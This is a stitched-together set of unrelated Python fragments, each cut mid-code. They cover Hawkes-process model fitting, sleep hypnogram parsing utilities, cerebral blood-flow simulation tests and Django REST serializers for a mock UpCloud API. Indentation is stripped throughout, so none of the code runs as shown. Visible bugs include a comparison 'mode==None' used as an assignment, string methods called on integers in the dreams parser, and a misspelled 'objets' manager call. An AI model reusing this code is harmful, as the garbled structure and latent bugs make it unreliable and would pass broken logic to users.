K = S.shape[1]
S_ct, C_ct, T = convert_discrete_to_continuous(S, dt)
S_test_ct, C_test_ct, T_test = convert_discrete_to_continuous(S_test, dt)
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading Gibbs results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a continuous time network Hawkes model using Gibbs sampling")
test_model = \
ContinuousTimeNetworkHawkesModel(K, dt_max=dt_max, **model_args)
test_model.add_data(S_ct, C_ct, T)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Gibbs sample
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test_ct, C_test_ct, T_test)]
times = [0]
for _ in progprint_xrange(N_samples, perline=25):
# Update the model
tic = time.time()
test_model.resample_model()
times.append(time.time() - tic)
samples.append(copy.deepcopy(test_model.get_parameters()))
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test_ct, C_test_ct, T_test))
# # Save this sample
# with open(output_path + ".gibbs.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving Gibbs samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_network_hawkes_vb(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading VB results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using batch VB")
test_model = DiscreteTimeNetworkHawkesModelGammaMixtureSBM(K=K, dt=dt, dt_max=dt_max,
**model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Batch variational inference
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = [0]
for itr in progprint_xrange(N_samples):
# Update the model
tic = time.time()
test_model.meanfield_coordinate_descent_step()
times.append(time.time() - tic)
# Resample from variational posterior to compute log prob and hlls
test_model.resample_from_mf()
# samples.append(test_model.copy_sample())
samples.append(copy.deepcopy(test_model.get_parameters()))
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test, F=F_test))
# Save this sample
# with open(output_path + ".svi.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving VB samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_network_hawkes_svi(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60,
delay=10.0,
forgetting_rate=0.25):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading SVI results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using SVI")
test_model = DiscreteTimeNetworkHawkesModelGammaMixtureSBM(K=K, dt=dt, dt_max=dt_max,
**model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# TODO: Add the data in minibatches
minibatchsize = 3000
stepsize = (np.arange(N_samples) + delay)**(-forgetting_rate)
# Stochastic variational inference
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = | |
<filename>sleep_utils.py
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 21 20:19:26 2019
@author: skjerns
"""
from pyedflib.highlevel import *
import os
import gc
import warnings
import ospath #pip install https://github.com/skjerns/skjerns-utils
import numpy as np
import pyedflib #pip install https://github.com/skjerns/pyedflib/archive/custom_version.zip
import time
from tqdm import tqdm
from datetime import datetime
import dateparser
import logging
from joblib import Parallel, delayed
import matplotlib.pyplot as plt
from lspopt import spectrogram_lspopt
import matplotlib
def read_hypnogram(hypno_file, epochlen = 30, epochlen_infile=None, mode='auto', exp_seconds=None):
"""
reads a hypnogram file as created by VisBrain or as CSV type
:param hypno_file: a path to the hypnogram
:param epochlen: how many seconds per label in output
:param epochlen_infile: how many seconds per label in original file
:param mode: 'auto', 'time' or 'csv', see SleepDev/docs/hypnogram.md
:param exp_seconds: How many seconds does the matching recording have?
"""
assert str(type(epochlen)()) == '0'
assert epochlen_infile is None or str(type(epochlen_infile)()) == '0'
with open(hypno_file, 'r') as file:
content = file.read()
content = content.replace('\r', '') # remove windows style \r\n
#conversion dictionary
conv_dict = {'WAKE':0, 'WACH':0, 'WK':0, 'NWAKE': 0,
'N1': 1, 'NREM1': 1,
'N2': 2, 'NREM2': 2,
'N3': 3, 'NREM3': 3,
'N4':3, 'NREM4': 3,
'REM': 4,
0:0, 1:1, 2:2, 3:3, 4:4, -1:5, 5:5,
'ART': 5, 'A':5, 'ARTEFAKT':5, '8': 5,
'MT':5, 'BEWEGUNG':5, '9':5, '?': 5, ' ': 5, 'NAN': 5,
'UNSCORED': 5}
lines = content.split('\n')
if mode=='auto':
if lines[0].startswith('*'): # if there is a star, we assume it's the visbrain type
mode = 'visbrain'
elif lines[0].replace('-', '').isnumeric():
mode = 'csv'
elif lines[0].startswith('[HypnogramAASM]'):
mode = 'dreams'
elif lines[0].startswith(' Epoch Number ,Start Time ,Sleep Stage'):
mode = 'alice'
elif 'abstime' in lines[0]:
mode = 'dat'
elif lines[0].startswith('Signal ID:'):
mode = 'somnoscreen'
elif any(['luna-' in x for x in lines[:5]]):
mode = 'luna'
elif hypno_file.endswith('.eannot'):
mode = 'csv'
else :
mode==None
# reading file in format as used by <NAME>
# files with a datestamp per stage annotation
if mode=='dat':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but hypnogram is'
'time based, will be ignored')
elif exp_seconds and not epochlen_infile:
epochlen_infile=exp_seconds//len(lines)
print('[INFO] Assuming csv annotations with one entry per {} seconds'.format(epochlen_infile))
stages = []
for line1, line2 in zip(lines[1:-1], lines[2:]):
if len(line1.strip())==0: continue # skip empty lines
if len(line2.strip())==0: continue # skip empty lines
curr_t, _, stage, *_ = line1.split('\t')
next_t,*_ = line2.split('\t')
curr_t = datetime.strptime(curr_t, '%Y-%m-%d %H:%M:%S')
next_t = datetime.strptime(next_t, '%Y-%m-%d %H:%M:%S')
assert next_t > curr_t, 'timestamp 2 is smaller than 1? {} < {}'.format(next_t, curr_t)
sec_diff = (next_t - curr_t).seconds
if exp_seconds and epochlen_infile!=sec_diff:
warnings.warn('Epochlen in file is {} but {} would be selected'.format(sec_diff, epochlen_infile))
stage = conv_dict[stage.upper()]
stages.extend([stage]*sec_diff)
elif mode=='somnoscreen':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but information is in file, will be ignored')
epochlen_infile = int(lines[5].replace('Rate: ', '').replace('s',''))
stages = []
for line in lines[6:]:
if len(line.strip())==0: continue # skip empty lines
_,stage = line.split('; ')
stage = conv_dict[stage.upper()]
stages.extend([stage]*epochlen_infile)
# read hypnogram as written by visbrain (time based)
elif mode=='visbrain':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but hypnogram is time based,'
'will be ignored')
stages = []
prev_t = 0
for line in lines:
if len(line.strip())==0: continue
if line[0] in '*#%/\\"\'': continue # this line seems to be a comment
s, t = line.split('\t')
t = float(t)
s = conv_dict[s.upper()]
l = int(np.round((t-prev_t))) # length of this stage
stages.extend([s]*l)
prev_t = t
# read hypnogram as simple CSV file, number based or string based
elif mode=='csv':
if exp_seconds and not epochlen_infile:
epochlen_infile=exp_seconds//len(lines)
print('[INFO] Assuming csv annotations with one entry per {} seconds'.format(epochlen_infile))
elif epochlen_infile is None:
if len(lines) < 2500: # we assume no recording is longer than 21 hours
epochlen_infile = 30
else:
epochlen_infile = 1
print('[INFO] Assuming csv annotations are per second')
lines = [conv_dict[l.upper()] if isinstance(l, str) else int(l) for l in lines if len(l)>0]
lines = [[line]*epochlen_infile for line in lines]
stages = np.array(lines).flatten()
# for the Dreams Database
# http://www.tcts.fpms.ac.be/~devuyst/Databases/DatabaseSubjects/
elif mode=='dreams':
epochlen_infile = 5
conv_dict = {-2:5,-1:5, 0:5, 1:3, 2:2, 3:1, 4:4, 5:0}
lines = [[int(line)] for line in lines[1:] if len(line)>0]
lines = [[line]*epochlen_infile for line in lines]
stages = np.array([conv_dict[l.upper()] for l in np.array(lines).flatten()])
# for hypnogram created with Alice 5 software
elif mode=='alice':
epochlen_infile = 30
lines = [line.split(',')[-1] for line in lines[1:] if len(line)>0]
lines = [[line]*epochlen_infile for line in lines]
try: stages = np.array([conv_dict[l] for l in np.array(lines).flatten()])
except KeyError as e:
print('Unknown sleep stage in file')
raise e
elif mode=='luna':
# hypnograms created by Luna software from sleepdata.org
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but information is in file, will be ignored')
import xml.etree.ElementTree as ET
root = ET.fromstringlist(lines)
# we don't actually properly parse it as it is intended, just
# assume that it always contains the same labels
instances = root[-1]
stages = []
for instance in instances:
stage_str = instance.attrib['class']
try: stage_nr = conv_dict[stage_str.upper()]
except KeyError as e:
print(f'Unknown sleep stage in file {hypno_file} : {stage_str}')
raise e
duration = int(instance.find('Duration').text)
if duration!=30:
raise ValueError(f'Duration!=30, not expected: {duration}')
stages.extend([stage_nr]*duration)
stages = np.array(stages)
else:
raise ValueError('This is not a recognized hypnogram: {}'.format(hypno_file))
stages = stages[::epochlen]
if len(stages)==0:
print('[WARNING] hypnogram loading failed, len == 0')
return np.array(stages)
def infer_eeg_channels(ch_names):
"""
This function receives a list of channel names and will return
one frontal, one central and one occipital channel.
"""
f = ['EEG Fz', 'EEG F4', 'EEG Fpz', 'EEG Fp1', 'EEG Fp2']
c = ['EEG C4', 'EEG C3']
o = ['EEG Oz', 'EEG O2', 'EEG O1']
found = []
# find frontal channel
for ch in ch_names:
if any([x in ch for x in f]):
found.append(ch)
break
# find central channel
for ch in ch_names:
if any([x in ch for x in c]):
found.append(ch)
break
# find occipital channel
for ch in ch_names:
if any([x in ch for x in o]):
found.append(ch)
break
return found
def infer_eog_channels(ch_names):
"""
This function receives a list of channel names and will return
one frontal, one central and one occipital channel.
"""
eog = ['EOG ROC', 'EOG LOC']
found = []
# find frontal channel
for ch in ch_names:
if any([x in ch for x in eog]):
found.append(ch)
return found
def infer_emg_channels(ch_names):
"""
This function receives a list of channel names and will return
one frontal, one central and one occipital channel.
"""
emg = ['EM<NAME>']
found = []
# find frontal channel
for ch in ch_names:
if any([x in ch for x in emg]):
found.append(ch)
return found
def hypno2time(hypno, seconds_per_epoch=1):
"""
Converts a hypnogram based in epochs into the format as defined
by VisBrain: http://visbrain.org/sleep.html#save-hypnogram
"""
hypno = np.repeat(hypno, seconds_per_epoch)
s = '*Duration_sec {}\n'.format(len(hypno))
stages = ['Wake', 'N1', 'N2', 'N3', 'REM', 'Art']
d = dict(enumerate(stages))
hypno_str = [d[h] for h in hypno]
last_stage=hypno_str[0]
for second, stage in enumerate(hypno_str):
if stage!=last_stage:
s += '{}\t{}\n'.format(last_stage, second)
last_stage=stage
s += '{}\t{}\n'.format(stage, second+1)
return s
def write_hypnogram(hypno, filename, seconds_per_annotation=30,
comment=None, overwrite=False):
"""
Save a hypnogram based on annotations per epochs in VisBrain style
(ie. The exact onset of each sleep stage is annotated in time space.)
This format is recommended for saving hypnograms as it avoids ambiguity.
:param filename: where to save the data
:param hypno: The hypnogram either as list or np.array
:param seconds_per_epoch: How many seconds each annotation contains
:param comment: Add a comment to the beginning of the file
:param overwrite: overwrite file?
"""
assert not ospath.exists(filename) or overwrite, \
'File already exists, no overwrite'
hypno = np.repeat(hypno, seconds_per_annotation)
hypno_str = hypno2time(hypno)
if comment is not None:
comment = comment.replace('\n', '\n*')
hypno_str = '*' + comment + '\n' + hypno_str
hypno_str = hypno_str.replace('\n\n', '\n')
with open(filename, 'w') as f:
f.write(hypno_str)
return True
def minmax2lsb(dmin, dmax, pmin, pmax):
"""
converts the edf min/max values to lsb and offset (x*m+b)
"""
lsb = (pmax - pmin) / (dmax - dmin)
offset = pmax | |
np.inf, 'maxiter': 40000}}
# minimizer_kwargs = {'method': 'L-BFGS-B', 'args': (eqnInfoDictList, fluidMethod, errorNorm), 'bounds': boundsVelocityPressure, 'options': {'maxiter': 40000, 'maxfun': 40000}}
optResult = basinhopping(computeNetworkDetail, velocityPressureInit, minimizer_kwargs=minimizer_kwargs, niter=100, T=1000, stepsize=500, interval=5, niter_success=15, disp=True)
velocityPressure = np.abs(optResult.x)
cost = optResult.fun
message = optResult.message
print('cost={}, message={}'.format(cost, message))
pressures = velocityPressure[numOfEdges:]
print('Minimum pressure is {} mmHg and maximum pressure is {} mmHg'.format((np.amin(pressures))/13560/9.8*1000, (np.amax(pressures))/13560/9.8*1000))
velocities = velocityPressure[:numOfEdges]
print('Minimum velocity is {} m/s and maximum velocity is {} m/s'.format(np.amin(velocities), np.amax(velocities)))
self.velocityPressure = velocityPressure
self.validateFluidEquations(velocityPressure=velocityPressure)
if saveResult:
directory = self.directory
saveFolderPath = join(directory, 'fluidSimulationResult')
saveFileName = 'fluidSimulationResult_GBMTest5_Timestep={}_v1.pkl'.format(currentTimeStep)
resultDict = {'G': copy.deepcopy(self.G), 'nodeInfoDict': copy.deepcopy(self.nodeInfoDict), 'edgeInfoDict': copy.deepcopy(self.edgeInfoDict),
'velocityPressure': copy.deepcopy(velocityPressure)}
with open(join(saveFolderPath, saveFileName), 'wb') as f:
pickle.dump(resultDict, f, 2)
print('{} saved to {}'.format(saveFileName, saveFolderPath))
elapsed = timeit.default_timer() - start_time
print('Elapsed time for function {}: {} sec'.format(functionName, elapsed))
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
def GBMTest5b(self, numOfTimeSteps=4, interpolationOption=1, saveResult=False):
"""
Using the GBM network and the radius info from BraVa and 2013, interpolate the radius (in different ways) for
the time point in between, TODO !!!
numOfTimeSteps has to be >= 2 (including the two end time steps)
interpolationOption=1 interpolates the radius linearly, interpolationOption=2 uses a logistic curve (bent
upwards), interpolationOption=3 uses a logistic curve (bent downwards)
Saved Result:
fluidSimulationResultTest6_Timestep={}_v1.pkl: everything normal
"""
start_time = timeit.default_timer()
functionName = inspect.currentframe().f_code.co_name
self.loadNetwork(version=4, year='BraVa')
self.convertNetowrk()
self.adjustNetwork()
self.setNetwork(option=2)
self.createGroundTruth(option=2) # just to get nodeIndex and edgeIndex and isBifurcatingNode
volumePerPartitionGroundTruth = self.getVolumePerPartition()
print('Ground truth:')
self.printTerminatingPressurePerPartition()
edgeIndexList = self.edgeIndexList
G = self.G
edgeRadiusTimeStepList = np.zeros((len(edgeIndexList), numOfTimeSteps)).tolist()
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][0] = radius
# Change the radius #
# extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,4,7,9,11,5,6]}
extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,7]}
self.perturbNetwork(option=2, extraInfo=extraInfo)
self.setNetwork(option=2)
# success = self.createGroundTruth(option=2)
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][-1] = radius
# Interpolate the radius for other time steps #
if interpolationOption == 1:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) / (numOfTimeSteps - 1) * ii + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
elif interpolationOption == 2:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) * np.tanh(ii / (numOfTimeSteps-1) * 2) + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
# print(edgeRadiusTimeStepList)
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
nodeInfoDict = self.nodeInfoDict
edgeInfoDict = self.edgeInfoDict
maxTimeStep = numOfTimeSteps
# fitResultPerPartition = self.fitTerminatingPressureToPathLength(showFittingResult=True, figIndex=2, isLastFigure=True)
fitResultPerPartition = self.fitTerminatingPressureToPathLength()
# Start from T1 because T0 is used as a reference case (but still solve T0 just to make a record)
for currentTimeStep in range(0, 5):
print('##### currentTimeStep={} #####'.format(currentTimeStep))
radiusList = [edgeRadiusTimeStepList[edgeIndex][currentTimeStep] for edgeIndex in edgeIndexList]
self.updateEdgeRadius(radiusList)
volumePerPartition = self.getVolumePerPartition()
pressureDropChangePerPartition = {}
for partitionName, volume in volumePerPartition.items():
volumeGroundTruth = volumePerPartitionGroundTruth[partitionName]
volumeChange = (volume - volumeGroundTruth) / volumeGroundTruth
pressureDropChangePerPartition[partitionName] = -volumeChange
print(pressureDropChangePerPartition)
def GBMTest6(self, numOfTimeSteps=4, interpolationOption=1, saveResult=False):
"""
Exactly the same as GBMTest5, tweaked the solver setting a little, trying to see if results can be improved.
numOfTimeSteps has to be >= 2 (including the two end time steps)
interpolationOption=1 interpolates the radius linearly, interpolationOption=2 uses a logistic curve (bent
upwards), interpolationOption=3 uses a logistic curve (bent downwards)
Saved Result:
fluidSimulationResult_GBMTest6_Timestep={}_v1.pkl: everything normal
"""
start_time = timeit.default_timer()
functionName = inspect.currentframe().f_code.co_name
self.loadNetwork(version=4, year='BraVa')
self.convertNetowrk()
self.adjustNetwork()
self.setNetwork(option=2)
self.createGroundTruth(option=2) # just to get nodeIndex and edgeIndex and isBifurcatingNode
volumePerPartitionGroundTruth = self.getVolumePerPartition()
print('Ground truth:')
self.printTerminatingPressurePerPartition()
edgeIndexList = self.edgeIndexList
G = self.G
edgeRadiusTimeStepList = np.zeros((len(edgeIndexList), numOfTimeSteps)).tolist()
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][0] = radius
# Change the radius #
# extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,4,7,9,11,5,6]}
extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,7]}
self.perturbNetwork(option=2, extraInfo=extraInfo)
self.setNetwork(option=2)
# success = self.createGroundTruth(option=2)
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][-1] = radius
# Interpolate the radius for other time steps #
if interpolationOption == 1:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) / (numOfTimeSteps - 1) * ii + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
elif interpolationOption == 2:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) * np.tanh(ii / (numOfTimeSteps-1) * 2) + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
# print(edgeRadiusTimeStepList)
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
nodeInfoDict = self.nodeInfoDict
edgeInfoDict = self.edgeInfoDict
maxTimeStep = numOfTimeSteps
# fitResultPerPartition = self.fitTerminatingPressureToPathLength(showFittingResult=True, figIndex=2, isLastFigure=True)
fitResultPerPartition = self.fitTerminatingPressureToPathLength()
# Start from T1 because T0 is used as a reference case (but still solve T0 just to make a record)
for currentTimeStep in range(0, 5):
print('##### currentTimeStep={} #####'.format(currentTimeStep))
radiusList = [edgeRadiusTimeStepList[edgeIndex][currentTimeStep] for edgeIndex in edgeIndexList]
self.updateEdgeRadius(radiusList)
volumePerPartition = self.getVolumePerPartition()
pressureDropChangePerPartition = {}
for partitionName, volume in volumePerPartition.items():
volumeGroundTruth = volumePerPartitionGroundTruth[partitionName]
volumeChange = (volume - volumeGroundTruth) / volumeGroundTruth
pressureDropChangePerPartition[partitionName] = -volumeChange
extraInfo = {'pressureDropChangePerPartition': pressureDropChangePerPartition}
self.perturbTerminatingPressure(option=5, extraInfo=extraInfo)
self.printTerminatingPressurePerPartition()
computeNetworkDetailExtraInfo = None
numOfNodes = len([node for node in nodeInfoDict if 'argsIndex' in nodeInfoDict[node]])
numOfEdges = len([edgeIndex for edgeIndex in edgeIndexList if 'argsIndex' in edgeInfoDict[edgeIndex]])
pressureIn = 13560 * 9.8 * 0.12 # Pascal # check if this number is consistent with that was used in the reference case!
velocityPressureInit = np.hstack((np.full((numOfEdges,), 0.4), np.linspace(pressureIn*0.8, pressureIn*0.5, numOfNodes)))
velocityPressureInit = [float(p) for p in velocityPressureInit]
# bounds in the form of ((min, min...), (max, max...)) #
# boundsVelocityPressure = [[], []] # first sublist contains lower bound and the second sublist contains upper bound
# boundsVelocityPressure[0] = [0] * numOfEdges + [13560*9.8*0.00] * numOfNodes # min velocity = 0 m/s, min pressure = 0 mmHg
# boundsVelocityPressure[1] = [5] * numOfEdges + [13560*9.8*0.12] * numOfNodes # max velocity = 5 m/s, max pressure = 120 mmHg
# boundsVelocityPressure = tuple(map(tuple, boundsVelocityPressure))
# bounds in the form of ((min, max), (min, max)...) #
boundsVelocityPressure = [[0, 5]] * numOfEdges + [[13560*9.8*0.00, 13560*9.8*0.12]] * numOfNodes
# Improve the lower bound of pressures at each node
# self.calculateVariableBounds()
# for node in G.nodes():
# if 'argsIndex' in nodeInfoDict[node]:
# argsIndex = self.nodeInfoDict[node]['argsIndex']
# minPressure = self.nodeInfoDict[node]['simulationData']['minPressure']
# boundsVelocityPressure[argsIndex][0] = minPressure
# boundsVelocityPressure = tuple(map(tuple, boundsVelocityPressure))
fluidMethod = 'HW'
# basinhopping, bounds in (min, max) pair form #
self.setupFluidEquations()
eqnInfoDictList = self.eqnInfoDictList
errorNorm = 2
minimizer_kwargs = {'method': 'BFGS', 'args': (eqnInfoDictList, fluidMethod, errorNorm, computeNetworkDetailExtraInfo), 'options': {'norm': np.inf, 'maxiter': 40000}}
# minimizer_kwargs = {'method': 'L-BFGS-B', 'args': (eqnInfoDictList, fluidMethod, errorNorm), 'bounds': boundsVelocityPressure, 'options': {'maxiter': 40000, 'maxfun': 40000}}
optResult = basinhopping(computeNetworkDetail, velocityPressureInit, minimizer_kwargs=minimizer_kwargs, niter=100, T=2000, stepsize=1000, interval=5, niter_success=16, disp=True)
velocityPressure = np.abs(optResult.x)
cost = optResult.fun
message = optResult.message
print('cost={}, message={}'.format(cost, message))
pressures = velocityPressure[numOfEdges:]
print('Minimum pressure is {} mmHg and maximum pressure is {} mmHg'.format((np.amin(pressures))/13560/9.8*1000, (np.amax(pressures))/13560/9.8*1000))
velocities = velocityPressure[:numOfEdges]
print('Minimum velocity is {} m/s and maximum velocity is {} m/s'.format(np.amin(velocities), np.amax(velocities)))
self.velocityPressure = velocityPressure
self.validateFluidEquations(velocityPressure=velocityPressure)
if saveResult:
directory = self.directory
saveFolderPath = join(directory, 'fluidSimulationResult')
saveFileName = 'fluidSimulationResult_GBMTest6_Timestep={}_v1.pkl'.format(currentTimeStep)
resultDict = {'G': copy.deepcopy(self.G), 'nodeInfoDict': copy.deepcopy(self.nodeInfoDict), 'edgeInfoDict': copy.deepcopy(self.edgeInfoDict),
'velocityPressure': copy.deepcopy(velocityPressure)}
with open(join(saveFolderPath, saveFileName), 'wb') as f:
pickle.dump(resultDict, f, 2)
print('{} saved to {}'.format(saveFileName, saveFolderPath))
elapsed = timeit.default_timer() - start_time
print('Elapsed time for function {}: {} sec'.format(functionName, elapsed))
def computeNetworkTest(self, saveResult=False):
"""
Check whether the solve can correctly solve a system by creating a ground truth model first and comparing the simulation result with it
| |
<filename>ao/upcloud/serializers.py<gh_stars>0
from rest_framework import serializers
from rest_framework import fields
from ao.core import fields as ao_fields
from ao.core import utils
from . import settings
from . import models
from . import factories
class SerializerMixin(object):
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(SerializerMixin, self).__init__(*args, **kwargs)
class AccountSerializer(serializers.ModelSerializer):
class Meta:
model = models.Account
fields = '__all__'
def to_representation(self, instance):
data = super(AccountSerializer, self).to_representation(instance)
data = {
'account': {
'credits': data['credits'],
'username': data['username']
}
}
return data
class ListZoneSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListZoneSerializer, self).to_representation(instance)
data = {'zones': {'zone': data}}
return data
@property
def data(self):
super(ListZoneSerializer, self).data
return self._data
class ZoneSerializer(serializers.Serializer):
"""list serializer"""
class Meta:
model = models.Zone
fields = '__all__'
list_serializer_class = ListZoneSerializer
def to_representation(self, instance):
data = super(ZoneSerializer, self).to_representation(instance)
data = {'zones': {'zone': data}}
return data
class ListPlanSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListPlanSerializer, self).to_representation(instance)
data = {'plans': {'plan': data}}
return data
@property
def data(self):
super(ListPlanSerializer, self).data
return self._data
class PlanSerializer(serializers.Serializer):
class Meta:
model = models.Plan
fields = '__all__'
list_serializer_class = ListPlanSerializer
def to_representation(self, instance):
data = super(PlanSerializer, self).to_representation(instance)
data = {'plans': {'plan': data}}
return data
class ListIpAddressSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListIpAddressSerializer, self).to_representation(instance)
data = {'ip_addresses': {'ip_address': data}}
return data
@property
def data(self):
super(ListIpAddressSerializer, self).data
return self._data
class IpAddressSerializer(serializers.ModelSerializer):
part_of_plan = ao_fields.YesNoField(required=False)
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
action_level = settings.IP_ADDRESS_ACTION_LEVEL
class Meta:
model = models.IpAddress
fields = '__all__'
def validate_server(self, value):
exists = models.Server.objects.filter(uuid=value.uuid).exists()
if exists:
value = str(models.Server.objects.get(uuid=value.uuid).uuid)
elif not exists and self.action_level == 0:
value = str(factories.ServerFactory(uuid=value.uuid).uuid)
else:
raise serializers.ValidationError('')
return value
def to_representation(self, instance):
data = super(IpAddressSerializer, self).to_representation(instance)
return data
class IpAddressListSerializer(IpAddressSerializer):
part_of_plan = ao_fields.YesNoField(required=False, write_only=True)
class Meta:
model = models.IpAddress
fields = '__all__'
list_serializer_class = ListIpAddressSerializer
class IpAddressDetailSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = '__all__'
def to_representation(self, instance):
data = super(IpAddressDetailSerializer, self).to_representation(instance)
data = {'ip_address': data}
return data
class CreateIpAddressSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('family', 'access', 'server')
class PostIpAddressSerializer(SerializerMixin, serializers.Serializer):
ip_address = CreateIpAddressSerializer()
def save(self, *args, **kwargs):
ip_data = self.validated_data['ip_address']
if settings.IP_ADDRESS_ACTION_LEVEL == 0:
server = models.Server.objects.filter(uuid=ip_data.pop('server')).first()
ip_data.update(server=server,
server__account=self.account)
instance = factories.IpAddressFactory(**ip_data)
else:
# TODO: Manage public/private
address = factories.fake.ipv4() if ip_data['family'] == 'IPV4' else factories.fake.ipv6()
ptr_record = '%s.v6.zone.host.upcloud.com' % factories.fake.user_name()
ip_data.update(address=address,
part_of_plan=False,
ptr_record=ptr_record)
instance = IpAddress.objets.create(**ip_data)
instance.family = factories.make_ip_family(instance)
return instance
class ModifyIpAddressSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('ptr_record',)
def update(self, *args, **kwargs):
pass
class PutIpAddressSerializer(SerializerMixin, serializers.Serializer):
ip_address = ModifyIpAddressSerializer()
def save(self, *args, **kwargs):
self.instance.ptr_record = self.validated_data['ip_address']['ptr_record']
self.instance.save()
return self.instance
@property
def data(self):
serializer = IpAddressListSerializer(self.instance)
return serializer.data
class ListStorageSerializer(serializers.ListSerializer):
